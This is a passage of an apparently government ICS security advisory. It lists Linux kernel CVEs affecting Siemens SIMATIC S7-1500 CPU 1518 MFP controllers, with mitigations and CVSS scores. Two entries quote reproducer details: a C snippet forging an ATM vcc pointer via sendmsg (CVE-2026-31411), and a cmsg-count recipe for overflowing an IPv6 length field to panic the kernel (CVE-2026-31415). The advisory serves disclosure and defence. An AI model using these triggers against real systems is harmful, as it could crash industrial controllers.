<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31411</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: atm: fix crash due to unvalidated vcc pointer in sigd_send() Reproducer available at [1]. The ATM send path (sendmsg -&gt; vcc_sendmsg -&gt; sigd_send) reads the vcc pointer from msg-&gt;vcc and uses it directly without any validation. This pointer comes from userspace via sendmsg() and can be arbitrarily forged: int fd = socket(AF_ATMSVC, SOCK_DGRAM, 0); ioctl(fd, ATMSIGD_CTRL); // become ATM signaling daemon struct msghdr msg = { .msg_iov = &amp;iov, ... }; *(unsigned long *)(buf + 4) = 0xdeadbeef; // fake vcc pointer sendmsg(fd, &amp;msg, 0); // kernel dereferences 0xdeadbeef In normal operation, the kernel sends the vcc pointer to the signaling daemon via sigd_enq() when processing operations like connect(), bind(), or listen(). The daemon is expected to return the same pointer when responding. However, a malicious daemon can send arbitrary pointer values. Fix this by introducing find_get_vcc() which validates the pointer by searching through vcc_hash (similar to how sigd_close() iterates over all VCCs), and acquires a reference via sock_hold() if found. Since struct atm_vcc embeds struct sock as its first member, they share the same lifetime. Therefore using sock_hold/sock_put is sufficient to keep the vcc alive while it is being used. Note that there may be a race with sigd_close() which could mark the vcc with various flags (e.g., ATM_VF_RELEASED) after find_get_vcc() returns. However, sock_hold() guarantees the memory remains valid, so this race only affects the logical state, not memory safety. [1]: https://gist.github.com/mrpre/1ba5949c45529c511152e2f4c755b0f3</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31411">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/822.html">CWE-822 Untrusted Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31414</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_expect: use expect-&gt;helper Use expect-&gt;helper in ctnetlink and /proc to dump the helper name. Using nfct_help() without holding a reference to the master conntrack is unsafe. Use exp-&gt;master-&gt;helper in ctnetlink path if userspace does not provide an explicit helper when creating an expectation to retain the existing behaviour. The ctnetlink expectation path holds the reference on the master conntrack and nf_conntrack_expect lock and the nfnetlink glue path refers to the master ct that is attached to the skb.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31414">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31415</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: avoid overflows in ip6_datagram_send_ctl() Yiming Qian reported : I believe I found a locally triggerable kernel bug in the IPv6 sendmsg ancillary-data path that can panic the kernel via `skb_under_panic()` (local DoS). The core issue is a mismatch between: - a 16-bit length accumulator (`struct ipv6_txoptions::opt_flen`, type `__u16`) and - a pointer to the *last* provided destination-options header (`opt-&gt;dst1opt`) when multiple `IPV6_DSTOPTS` control messages (cmsgs) are provided. - `include/net/ipv6.h`: - `struct ipv6_txoptions::opt_flen` is `__u16` (wrap possible). (lines 291-307, especially 298) - `net/ipv6/datagram.c:ip6_datagram_send_ctl()`: - Accepts repeated `IPV6_DSTOPTS` and accumulates into `opt_flen` without rejecting duplicates. (lines 909-933) - `net/ipv6/ip6_output.c:__ip6_append_data()`: - Uses `opt-&gt;opt_flen + opt-&gt;opt_nflen` to compute header sizes/headroom decisions. (lines 1448-1466, especially 1463-1465) - `net/ipv6/ip6_output.c:__ip6_make_skb()`: - Calls `ipv6_push_frag_opts()` if `opt-&gt;opt_flen` is non-zero. (lines 1930-1934) - `net/ipv6/exthdrs.c:ipv6_push_frag_opts()` / `ipv6_push_exthdr()`: - Push size comes from `ipv6_optlen(opt-&gt;dst1opt)` (based on the pointed-to header). (lines 1179-1185 and 1206-1211) 1. `opt_flen` is a 16-bit accumulator: - `include/net/ipv6.h:298` defines `__u16 opt_flen; /* after fragment hdr */`. 2. `ip6_datagram_send_ctl()` accepts *repeated* `IPV6_DSTOPTS` cmsgs and increments `opt_flen` each time: - In `net/ipv6/datagram.c:909-933`, for `IPV6_DSTOPTS`: - It computes `len = ((hdr-&gt;hdrlen + 1) &lt;&lt; 3);` - It checks `CAP_NET_RAW` using `ns_capable(net-&gt;user_ns, CAP_NET_RAW)`. (line 922) - Then it does: - `opt-&gt;opt_flen += len;` (line 927) - `opt-&gt;dst1opt = hdr;` (line 928) There is no duplicate rejection here (unlike the legacy `IPV6_2292DSTOPTS` path which rejects duplicates at `net/ipv6/datagram.c:901-904`). If enough large `IPV6_DSTOPTS` cmsgs are provided, `opt_flen` wraps while `dst1opt` still points to a large (2048-byte) destination-options header. In the attached PoC (`poc.c`): - 32 cmsgs with `hdrlen=255` =&gt; `len = (255+1)*8 = 2048` - 1 cmsg with `hdrlen=0` =&gt; `len = 8` - Total increment: `32*2048 + 8 = 65544`, so `(__u16)opt_flen == 8` - The last cmsg is 2048 bytes, so `dst1opt` points to a 2048-byte header. 3. The transmit path sizes headers using the wrapped `opt_flen`: - In `net/ipv6/ip6_output.c:1463-1465`: - `headersize = sizeof(struct ipv6hdr) + (opt ? opt-&gt;opt_flen + opt-&gt;opt_nflen : 0) + ...;` With wrapped `opt_flen`, `headersize`/headroom decisions underestimate what will be pushed later. 4. When building the final skb, the actual push length comes from `dst1opt` and is not limited by wrapped `opt_flen`: - In `net/ipv6/ip6_output.c:1930-1934`: - `if (opt-&gt;opt_flen) proto = ipv6_push_frag_opts(skb, opt, proto);` - In `net/ipv6/exthdrs.c:1206-1211`, `ipv6_push_frag_opts()` pushes `dst1opt` via `ipv6_push_exthdr()`. - In `net/ipv6/exthdrs.c:1179-1184`, `ipv6_push_exthdr()` does: - `skb_push(skb, ipv6_optlen(opt));` - `memcpy(h, opt, ipv6_optlen(opt));` With insufficient headroom, `skb_push()` underflows and triggers `skb_under_panic()` -&gt; `BUG()`: - `net/core/skbuff.c:2669-2675` (`skb_push()` calls `skb_under_panic()`) - `net/core/skbuff.c:207-214` (`skb_panic()` ends in `BUG()`) - The `IPV6_DSTOPTS` cmsg path requires `CAP_NET_RAW` in the target netns user namespace (`ns_capable(net-&gt;user_ns, CAP_NET_RAW)`). - Root (or any task with `CAP_NET_RAW`) can trigger this without user namespaces. - An unprivileged `uid=1000` user can trigger this if unprivileged user namespaces are enabled and it can create a userns+netns to obtain namespaced `CAP_NET_RAW` (the attached PoC does this). - Local denial of service: kernel BUG/panic (system crash). - ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31415">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31416</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_log: account for netlink header size This is a followup to an old bug fix: NLMSG_DONE needs to account for the netlink header size, not just the attribute size. This can result in a WARN splat + drop of the netlink message, but other than this there are no ill effects.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31416">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/131.html">CWE-131 Incorrect Calculation of Buffer Size</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31417</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/x25: Fix overflow when accumulating packets Add a check to ensure that `x25_sock.fraglen` does not overflow. The `fraglen` also needs to be resetted when purging `fragment_queue` in `x25_clear_queues()`.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31417">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31418</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: ipset: drop logically empty buckets in mtype_del mtype_del() counts empty slots below n-&gt;pos in k, but it only drops the bucket when both n-&gt;pos and k are zero. This misses buckets whose live entries have all been removed while n-&gt;pos still points past deleted slots. Treat a bucket as empty when all positions below n-&gt;pos are unused and release it directly instead of shrinking it further.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31418">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31421</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: cls_fw: fix NULL pointer dereference on shared blocks The old-method path in fw_classify() calls tcf_block_q() and dereferences q-&gt;handle. Shared blocks leave block-&gt;q NULL, causing a NULL deref when an empty cls_fw filter is attached to a shared block and a packet with a nonzero major skb mark is classified. Reject the configuration in fw_change() when the old method (no TCA_OPTIONS) is used on a shared block, since fw_classify()'s old-method path needs block-&gt;q which is NULL for shared blocks. The fixed null-ptr-deref calling stack: KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f] RIP: 0010:fw_classify (net/sched/cls_fw.c:81) Call Trace: tcf_classify (./include/net/tc_wrapper.h:197 net/sched/cls_api.c:1764 net/sched/cls_api.c:1860) tc_run (net/core/dev.c:4401) __dev_queue_xmit (net/core/dev.c:4535 net/core/dev.c:4790)</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31421">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31422</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: cls_flow: fix NULL pointer dereference on shared blocks flow_change() calls tcf_block_q() and dereferences q-&gt;handle to derive a default baseclass. Shared blocks leave block-&gt;q NULL, causing a NULL deref when a flow filter without a fully qualified baseclass is created on a shared block. Check tcf_block_shared() before accessing block-&gt;q and return -EINVAL for shared blocks. This avoids the null-deref shown below: ======================================================================= KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f] RIP: 0010:flow_change (net/sched/cls_flow.c:508) Call Trace: tc_new_tfilter (net/sched/cls_api.c:2432) rtnetlink_rcv_msg (net/core/rtnetlink.c:6980) [...] =======================================================================</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31422">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31423</a></h3>
<div class="csaf-accordion-content">
